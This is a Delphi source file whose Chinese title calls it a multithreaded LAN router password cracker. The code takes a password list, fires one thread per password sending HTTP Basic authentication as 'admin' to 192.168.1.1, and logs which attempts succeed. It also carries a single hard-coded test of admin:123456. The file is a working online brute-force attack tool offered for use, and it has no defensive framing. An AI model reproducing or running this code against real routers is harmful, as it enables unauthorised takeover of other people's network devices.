unit1.pas

局域网路由器用户密码多线程破解工具

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient,
  IdHTTP, StdCtrls;                        

type
  TForm1 = class(TForm)
    idhttp1: TIdHTTP;
    btn1: TButton;
    Memo1: TMemo;
    mmo2: TMemo;
    Label1: TLabel;
    lbl2: TLabel;
    lbl3: TLabel;
    lbl1: TLabel;
    btn2: TButton;
    procedure btn1Click(Sender: TObject);
    procedure btn2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

  getHttpThread = class(TThread)
  private
    strName, strPassword, strBase64: string;
  protected
    procedure Execute; override;
  end;

var
  Form1: TForm1;
  mgetHttpThread: getHttpThread;

implementation

{$R *.dfm}

uses base64;

procedure getHttpThread.Execute();
var
  RtnString, OutText: string;
  IdHttp1: TIdHTTP;
begin
  IdHttp1:=TIdHTTP.Create(nil);
  idHttp1.Request.CustomHeaders.Clear;
  idHttp1.Request.CustomHeaders.Text := 'Host: 192.168.1.1'+chr(13)+chr(10)+'Connection: Keep-Alive'+chr(13)+chr(10)+'Cookie: username=' + strName + chr(13)+chr(10) + 'Authorization: Basic '+ strBase64;
  try
    RtnString:=IdHttp1.Get('http://192.168.1.1/');
  except
    RtnString:='error';
  end;
  OutText:='Return: '+RtnString;
  if (Copy(RtnString,1,5)='error') then
  begin
    OutText:=OutText+chr(13)+chr(10)+strName+':'+strPassword+' login failure.';
  end
  else
  begin
    OutText:=OutText+chr(13)+chr(10)+strName+':'+strPassword+' login success.';
  end;
  idHttp1.Disconnect;
  Form1.Memo1.Lines.add(OutText+'Time:'+FormatDatetime('yyyy-mm-dd hh:nn:ss',now)+chr(13)+chr(10));
end;

procedure TForm1.btn1Click(Sender: TObject);
var
  tUsername, tPassword, Base64str: string;
  i: integer;
begin
  if mmo2.Lines.Count<=0 then exit;
  for i:=0 to mmo2.Lines.Count-1 do
  begin
    tUsername:='admin';
    tPassword:=mmo2.Lines.Strings[i];
    base64str:=StrToBase64(tUserName+':'+tPassword);
    mgetHttpThread:=getHttpThread.Create(false);
    mgetHttpThread.strName:=tUsername;     //经长时间试验发现在Create()中传递字符参数会造成句柄无效，传递int参数时貌似无此问题
    mgetHttpThread.strBase64:=base64str;   //故用此方法比较保守，但缺点是线程必须在引用处同一单元内！Delphi老了....
    mgetHttpThread.strPassword:=tPassword;
    lbl1.Caption:='Current: '+inttostr(i+1);
    lbl3.Caption:='Total: '+inttostr(mmo2.Lines.Count);
    Sleep(100);
  end;

end;

procedure TForm1.btn2Click(Sender: TObject);
var
  tUsername, tPassword, Base64str, RtnString: string;
begin
  tUsername:='admin';
  tPassword:='123456';
  idHttp1.Request.CustomHeaders.Clear;
  base64str:=StrToBase64(tUserName+':'+tPassword);
  idHttp1.Request.CustomHeaders.Text := 'Host: www.3322.org'+chr(13)+chr(10)+'Connection: Keep-Alive'+chr(13)+chr(10)+'Cookie: username=' + tUsername + chr(13)+chr(10) + 'Authorization: Basic '+ base64str;
  try
    RtnString:=IdHttp1.Get('http://192.168.1.1/');
  except
    RtnString:='error';
  end;
  Memo1.Lines.add('Return: '+RtnString);
  if (Copy(RtnString,1,5)='error') then
  begin
    Memo1.Lines.add('login failure.');
  end
  else
  begin
    Memo1.Lines.add('login success.');
  end;
  idHttp1.Disconnect;
  idhttp1.Destroy;
  Memo1.Lines.add('Time:'+FormatDatetime('yyyy-mm-dd hh:nn:ss',now));
  Memo1.Lines.add('');
end;

end.